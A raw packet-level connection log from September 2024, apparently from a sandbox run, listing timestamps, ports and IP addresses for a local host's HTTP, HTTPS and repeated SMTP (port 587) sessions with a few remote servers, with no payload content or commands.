Sep 26, 2024 13:44:16.861685991 CEST	80	49711	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:16.861754894 CEST	49711	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:16.862865925 CEST	80	49713	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:16.862936020 CEST	49713	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:16.863032103 CEST	49713	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:16.867958069 CEST	80	49713	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:17.661098003 CEST	80	49713	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:17.662225008 CEST	49715	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:17.662286997 CEST	443	49715	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:17.662370920 CEST	49715	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:17.662621975 CEST	49715	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:17.662636995 CEST	443	49715	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:17.715775967 CEST	49713	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:18.146544933 CEST	443	49715	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:18.148281097 CEST	49715	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:18.148322105 CEST	443	49715	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:18.300658941 CEST	443	49715	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:18.300915003 CEST	443	49715	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:18.300973892 CEST	49715	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:18.301362991 CEST	49715	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:18.305545092 CEST	49713	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:18.307432890 CEST	49718	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:18.310837030 CEST	80	49713	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:18.310899973 CEST	49713	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:18.312330961 CEST	80	49718	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:18.312396049 CEST	49718	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:18.312475920 CEST	49718	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:18.317189932 CEST	80	49718	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:19.110460043 CEST	80	49718	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:19.112067938 CEST	49719	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:19.112118959 CEST	443	49719	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:19.112660885 CEST	49719	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:19.112776995 CEST	49719	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:19.112785101 CEST	443	49719	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:19.153280973 CEST	49718	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:19.683768988 CEST	443	49719	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:19.686436892 CEST	49719	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:19.686471939 CEST	443	49719	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:19.842576027 CEST	443	49719	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:19.842689991 CEST	443	49719	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:19.847403049 CEST	443	49719	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:19.847465992 CEST	49719	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:19.850327015 CEST	49719	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:19.857701063 CEST	49719	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:20.075227976 CEST	49718	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:20.079499960 CEST	49720	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:20.080312014 CEST	80	49718	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:20.083381891 CEST	49718	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:20.084346056 CEST	80	49720	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:20.084857941 CEST	49720	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:20.084980965 CEST	49720	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:20.089740992 CEST	80	49720	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:20.990175009 CEST	80	49720	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:20.991724014 CEST	49723	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:20.991838932 CEST	443	49723	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:20.991925001 CEST	49723	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:20.992239952 CEST	49723	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:20.992278099 CEST	443	49723	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:21.043884993 CEST	49720	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:21.464622021 CEST	443	49723	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:21.474401951 CEST	49723	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:21.474493027 CEST	443	49723	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:21.590862036 CEST	443	49723	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:21.591146946 CEST	443	49723	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:21.594502926 CEST	49723	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:21.594960928 CEST	49723	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:21.597765923 CEST	49720	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:21.598763943 CEST	49724	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:21.602962017 CEST	80	49720	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:21.603636980 CEST	80	49724	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:21.603719950 CEST	49720	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:21.603746891 CEST	49724	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:21.603833914 CEST	49724	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:21.608604908 CEST	80	49724	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:22.485083103 CEST	80	49724	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:22.491204023 CEST	49725	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:22.491261959 CEST	443	49725	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:22.491348982 CEST	49725	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:22.494848967 CEST	49725	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:22.494879961 CEST	443	49725	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:22.528340101 CEST	49724	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:22.975681067 CEST	443	49725	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:22.977840900 CEST	49725	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:22.977910995 CEST	443	49725	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:23.107503891 CEST	443	49725	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:23.107584953 CEST	443	49725	188.114.96.3	192.168.2.7
Sep 26, 2024 13:44:23.107749939 CEST	49725	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:23.108112097 CEST	49725	443	192.168.2.7	188.114.96.3
Sep 26, 2024 13:44:23.121315956 CEST	49724	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:23.126427889 CEST	80	49724	132.226.8.169	192.168.2.7
Sep 26, 2024 13:44:23.126498938 CEST	49724	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:23.129288912 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 26, 2024 13:44:23.129333019 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 26, 2024 13:44:23.129404068 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 26, 2024 13:44:23.129839897 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 26, 2024 13:44:23.129858017 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 26, 2024 13:44:23.810281992 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 26, 2024 13:44:23.810357094 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 26, 2024 13:44:23.813319921 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 26, 2024 13:44:23.813344955 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 26, 2024 13:44:23.813651085 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 26, 2024 13:44:23.815084934 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 26, 2024 13:44:23.859409094 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 26, 2024 13:44:24.059309006 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 26, 2024 13:44:24.059545994 CEST	443	49726	149.154.167.220	192.168.2.7
Sep 26, 2024 13:44:24.059627056 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 26, 2024 13:44:24.063986063 CEST	49726	443	192.168.2.7	149.154.167.220
Sep 26, 2024 13:44:29.543664932 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:29.544563055 CEST	49707	80	192.168.2.7	132.226.8.169
Sep 26, 2024 13:44:29.548607111 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:29.548703909 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:30.181189060 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.181605101 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:30.186610937 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.353322983 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.353725910 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:30.358598948 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.526225090 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.526865959 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:30.533238888 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.705852985 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.705883026 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.705902100 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.705919027 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.705951929 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:30.705995083 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:30.792663097 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.797406912 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:30.802306890 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.968852997 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:30.971892118 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:30.976775885 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:31.143501043 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:31.144717932 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:31.150314093 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:31.317140102 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:31.317440987 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:31.322257042 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:31.489027023 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:31.489343882 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:31.495212078 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:31.662028074 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:31.662286997 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:31.668031931 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:31.894382000 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:31.934582949 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:32.080712080 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:32.085979939 CEST	587	49727	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:32.086056948 CEST	49727	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:41.392390013 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:41.397463083 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:41.397620916 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:42.027044058 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.027209997 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:42.032068014 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.462924004 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.463134050 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.463264942 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:42.463447094 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:42.468295097 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.641243935 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.648276091 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:42.653295994 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.835922956 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.835951090 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.835964918 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.835978031 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.836055994 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:42.836103916 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:42.922559977 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:42.924369097 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:42.929181099 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:43.095690966 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:43.097968102 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:43.102823019 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:43.273598909 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:43.273879051 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:43.278670073 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:43.456353903 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:43.456685066 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:43.462398052 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:43.665198088 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:43.665407896 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:43.671066999 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:43.879129887 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:43.879439116 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:43.884208918 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:44.127374887 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:44.128088951 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:44:44.134757996 CEST	587	49728	217.12.218.219	192.168.2.7
Sep 26, 2024 13:44:44.134829998 CEST	49728	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:03.674022913 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:03.679157972 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:03.679256916 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:04.337904930 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.338134050 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:04.343031883 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.515001059 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.515197039 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:04.519963980 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.696432114 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.697072983 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:04.706988096 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.886430025 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.886445999 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.886456013 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.886563063 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:04.886636019 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.886682034 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:04.973830938 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:04.975613117 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:04.981616020 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:05.402724981 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:05.403846025 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:05.403937101 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:05.404829979 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:05.413558006 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:05.585767031 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:05.586060047 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:05.591402054 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:05.763753891 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:05.764142990 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:05.770163059 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:05.942209959 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:05.942455053 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:05.947343111 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:06.119414091 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:06.119868994 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:06.124696016 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:06.354474068 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:06.355129004 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:06.360641003 CEST	587	49730	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:06.360779047 CEST	49730	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:42.433129072 CEST	49731	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:42.438313007 CEST	587	49731	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:42.438407898 CEST	49731	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:42.558782101 CEST	49731	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:42.563781977 CEST	587	49731	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:42.563838005 CEST	49731	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:42.794433117 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:42.800458908 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:42.800546885 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:43.437735081 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:43.437992096 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:43.443150043 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:43.609600067 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:43.612732887 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:43.618941069 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:43.786331892 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:43.786959887 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:43.791944981 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:43.965620041 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:43.965683937 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:43.965717077 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:43.965755939 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:43.965876102 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:43.965876102 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:44.130882025 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:44.184853077 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:44.200249910 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:44.205254078 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:44.371678114 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:44.380517006 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:44.385310888 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:44.551915884 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:44.552187920 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:44.556955099 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:44.723692894 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:44.723993063 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:44.728898048 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:44.895466089 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:44.895690918 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:44.900480032 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:45.067394972 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:45.067625046 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:45.072710991 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:45.279328108 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:45.279947042 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:45:45.286115885 CEST	587	49732	217.12.218.219	192.168.2.7
Sep 26, 2024 13:45:45.286181927 CEST	49732	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:08.109159946 CEST	49733	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:08.114428043 CEST	587	49733	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:08.114540100 CEST	49733	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:08.763739109 CEST	587	49733	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:08.763890028 CEST	49733	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:08.768773079 CEST	587	49733	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:08.935470104 CEST	587	49733	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:08.935610056 CEST	49733	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:08.940385103 CEST	587	49733	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:09.107906103 CEST	587	49733	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:09.110846043 CEST	49733	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:09.115731001 CEST	587	49733	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:09.171200037 CEST	49733	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:09.176333904 CEST	587	49733	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:09.176392078 CEST	49733	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:35.729315996 CEST	49734	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:35.734395981 CEST	587	49734	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:35.734500885 CEST	49734	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:36.373044014 CEST	587	49734	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:36.373198986 CEST	49734	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:36.378129959 CEST	587	49734	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:36.528892994 CEST	49734	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:46:36.534250021 CEST	587	49734	217.12.218.219	192.168.2.7
Sep 26, 2024 13:46:36.535507917 CEST	49734	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:01.439363956 CEST	49735	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:01.444323063 CEST	587	49735	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:01.444605112 CEST	49735	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:02.071041107 CEST	587	49735	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:02.071749926 CEST	49735	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:02.076576948 CEST	587	49735	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:02.243545055 CEST	587	49735	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:02.243671894 CEST	49735	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:02.248481035 CEST	587	49735	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:02.280471087 CEST	49735	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:02.285559893 CEST	587	49735	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:02.286652088 CEST	49735	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:27.703360081 CEST	49736	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:27.708403111 CEST	587	49736	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:27.708621025 CEST	49736	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:27.932591915 CEST	49736	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:27.937552929 CEST	587	49736	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:27.937622070 CEST	49736	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:39.462132931 CEST	49737	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:39.467037916 CEST	587	49737	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:39.467117071 CEST	49737	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:39.541919947 CEST	49737	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:39.546870947 CEST	587	49737	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:39.546928883 CEST	49737	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:43.005520105 CEST	49738	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:43.010552883 CEST	587	49738	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:43.010725021 CEST	49738	587	192.168.2.7	217.12.218.219
Sep 26, 2024 13:47:43.573765039 CEST	587	49738	217.12.218.219	192.168.2.7
Sep 26, 2024 13:47:43.574301958 CEST	49738	587	192.168.2.7	217.12.218.219
